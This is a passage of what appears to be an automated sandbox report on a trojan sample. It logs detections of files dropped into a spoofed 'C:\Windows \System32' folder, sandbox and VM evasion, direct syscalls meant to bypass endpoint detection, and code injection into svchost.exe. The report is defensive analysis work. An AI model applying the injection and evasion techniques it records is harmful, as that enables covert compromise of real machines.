    Source: pyld.dll.5.drStatic PE information: section name: /97
    Source: pyld.dll.5.drStatic PE information: section name: /113
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848A54AF5 push eax; ret 5_2_00007FF848A54B1D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848A53669 push esi; ret 5_2_00007FF848A5366A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848A563E7 push esp; retf 5_2_00007FF848A563E8
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848A53484 push esi; ret 5_2_00007FF848A534AA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848B279CA push eax; ret 5_2_00007FF848B279CD
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848B2236E push 8B485F91h; iretd 5_2_00007FF848B22376
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848B22319 push 8B485F91h; iretd 5_2_00007FF848B22321

    Persistence and Installation Behavior

    barindex
    Drops executables to the windows directory (C:\Windows) and starts them
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeExecutable created and started: C:\Windows \System32\printui.exeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\pyld.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\printui.dll (copy)Jump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\printui.dll (copy)Jump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 5728Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4809Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5050Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\pyld.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeAPI coverage: 1.9 %
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5020Thread sleep count: 4809 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5020Thread sleep count: 5050 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep time: -10145709240540247s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5004Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: svchost.exe, 00000002.00000002.3427486616.0000020857A8F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
    Source: svchost.exe, 00000002.00000002.3427486616.0000020857A8F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;n
    Source: powershell.exe, 00000005.00000002.3362404415.0000022977CD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
    Source: svchost.exe, 00000002.00000002.3427486616.0000020857A8F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
    Source: svchost.exe, 00000002.00000002.3427486616.0000020857A8F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;False]
    Source: svchost.exe, 00000002.00000000.2239205123.0000020857A8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427486616.0000020857A8F000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3363256427.0000022977F2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AAB2C0 free,IsDebuggerPresent,RaiseException,0_2_00007FF733AAB2C0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733A91180 Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,malloc,strlen,malloc,memcpy,_initterm,0_2_00007FF733A91180
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AA9550 TlsGetValue,CloseHandle,CloseHandle,CloseHandle,TlsSetValue,RemoveVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler,AddVectoredExceptionHandler,RtlAddVectoredExceptionHandler,CloseHandle,CloseHandle,CloseHandle,0_2_00007FF733AA9550
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733B7E760 SetUnhandledExceptionFilter,Sleep,0_2_00007FF733B7E760
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AA6E1C SetUnhandledExceptionFilter,0_2_00007FF733AA6E1C
    Source: C:\Windows \System32\printui.exeCode function: 8_2_00007FF763691880 SetUnhandledExceptionFilter,8_2_00007FF763691880
    Source: C:\Windows \System32\printui.exeCode function: 8_2_00007FF763691B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF763691B5C
    Source: C:\Windows \System32\printui.exeCode function: 11_2_00007FF763691880 SetUnhandledExceptionFilter,11_2_00007FF763691880
    Source: C:\Windows \System32\printui.exeCode function: 11_2_00007FF763691B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF763691B5C

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Yara detected Powershell decode and execute
    Source: Yara matchFile source: amsi64_6656.amsi.csv, type: OTHER
    Allocates memory in foreign processes
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory allocated: C:\Windows\System32\svchost.exe base: 208579F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20859990000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory allocated: C:\Windows\System32\svchost.exe base: 208599A0000 protect: page read and writeJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory allocated: C:\Windows\System32\svchost.exe base: 208599B0000 protect: page read and writeJump to behavior
    Creates a thread in another existing process (thread injection)
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeThread created: C:\Windows\System32\svchost.exe EIP: 579F0000Jump to behavior
    Found direct / indirect Syscall (likely to bypass EDR)
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeNtWriteVirtualMemory: Direct from: 0x7FF733A92CA0Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeNtQuerySystemInformation: Direct from: 0x7FF733A92CB8Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeNtClose: Direct from: 0x7FF733A92C7C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeNtDelayExecution: Direct from: 0x7FF733A92CD0Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeNtCreateThreadEx: Direct from: 0x7FF733A92CACJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeNtAllocateVirtualMemory: Direct from: 0x7FF733A92C94Jump to behavior
    Hijacks the control flow in another process
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: PID: 3428 base: 208579F0063 value: FFJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: PID: 3428 base: 2085999000B value: FFJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: PID: 3428 base: 20859990014 value: FFJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: PID: 3428 base: 20859990037 value: FFJump to behavior
    Writes to foreign memory regions
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0000Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0001Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0002Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0003Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0004Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0005Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0006Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0007Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0008Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0009Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F000AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F000BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F000CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F000DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F000EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F000FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0010Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0011Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0012Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0013Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0014Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0015Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0016Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0017Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0018Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0019Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F001AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F001BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F001CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F001DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F001EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F001FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0020Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0021Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0022Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0023Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0024Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0025Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0026Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0027Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0028Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0029Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F002AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F002BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F002CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F002DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F002EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F002FJump to behavior
